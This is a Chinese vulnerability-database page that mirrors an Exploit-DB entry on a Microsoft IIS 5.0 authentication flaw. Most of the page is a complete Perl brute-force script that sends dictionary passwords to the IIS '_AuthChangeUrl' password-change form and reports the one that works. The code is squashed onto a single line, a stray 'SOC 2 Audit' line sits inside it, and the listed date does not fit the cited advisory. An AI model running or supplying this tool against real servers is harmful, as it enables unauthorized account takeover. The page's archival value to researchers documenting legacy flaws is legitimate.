Microsoft IIS 5.0 – User Existence Disclosure (1)

Microsoft IIS 5.0 – User Existence Disclosure (1)

漏洞ID 1053383 漏洞类型
发布时间 1999-02-24 更新时间 1999-02-24
图片[1]-Microsoft IIS 5.0 – User Existence Disclosure (1)-安全小百科CVE编号 N/A
图片[2]-Microsoft IIS 5.0 – User Existence Disclosure (1)-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22562
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7492/info

Microsoft IIS is prone to an issue where the existence of users may be revealed to remote attackers. The vulnerability exists when users attempt to authenticate against a vulnerable system.

IIS will generate an error page if authentication fails. Different messages are generated depending on whether the user exists or not.

##########################################################################
#################
# Miscrosoft IIS Authentication Manager BruteForce Tool - By JeiAr
SOC 2 Audit
########################################################################## ################# # This tool can be used to brute force user accounts via dictionary attack on the Microsoft # IIS Authentication Manager. More details here http://www.securityfocus.com/archive/1/8515 ########################################################################## ################# use LWP::UserAgent; ########################################################################## ################# # Time to create the new LWP User Agent, Clear the screen, And print out the scripts header ########################################################################## ################# $ua = new LWP::UserAgent; $ua->agent("AgentName/0.1 " . $ua->agent); system('cls'); &header; ########################################################################## ################# # Gather all user inputted data. Such as the domain name, host and location of the wordlist ########################################################################## ################# print "Host: "; $host=<STDIN>; chomp $host; print "Domain: "; $domain=<STDIN>; chomp $domain; print "Account: "; $account=<STDIN>; chomp $account; print "Word List: "; $list=<STDIN>; chomp $list; ########################################################################## ################# # Opens the wordlist and puts the data into an array. afterward setting the count variables ########################################################################## ################# open (DATAFILE, "$list"); @datafile = <DATAFILE>; chomp(@datafile); $length = @datafile; $count = 0; $found = 0; &space; print "Cracked Accountsn"; print "----------------n"; ########################################################################## ################# # Creates the HTTP request, Checks the responses, then prints out the username if it exists ########################################################################## ################# while ($count < $length) { $password = (@datafile[$count]); my $req = new HTTP::Request POST => "http://$host/_AuthChangeUrl?"; $req->content_type('application/x-www-form-urlencoded'); $req->content ("domain=$domain&acct=$account&old=$password&new=$password&new2=$password" ); my $res = $ua->request($req); $pattern = "Password successfully changed"; $_ = $res->content; if (/$pattern/) { print "$account : $passwordn"; last if (/$pattern/); } $count++; } ########################################################################## ################# # Thats all folks. Prints out the final details and footer. Rest is just the subroutines :) ########################################################################## ################# &space; &footer; sub header { print "IIS Auth Manager Brute Forcing Tool By JeiAr [http://www.gulftech.org] n"; print "------------------------------------------------------------------- --- n"; } sub footer { print "Session Results:n"; print "--------------------n"; print "Number Of Words : $length n"; print "Number Of Tries : $count n"; } sub space { print "n" x2; }

相关推荐: Linux rcp漏洞

Linux rcp漏洞 漏洞ID 1207565 漏洞类型 未知 发布时间 1997-02-03 更新时间 1997-02-03 CVE编号 CVE-1999-1299 CNNVD-ID CNNVD-199702-006 漏洞平台 N/A CVSS评分 10.…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享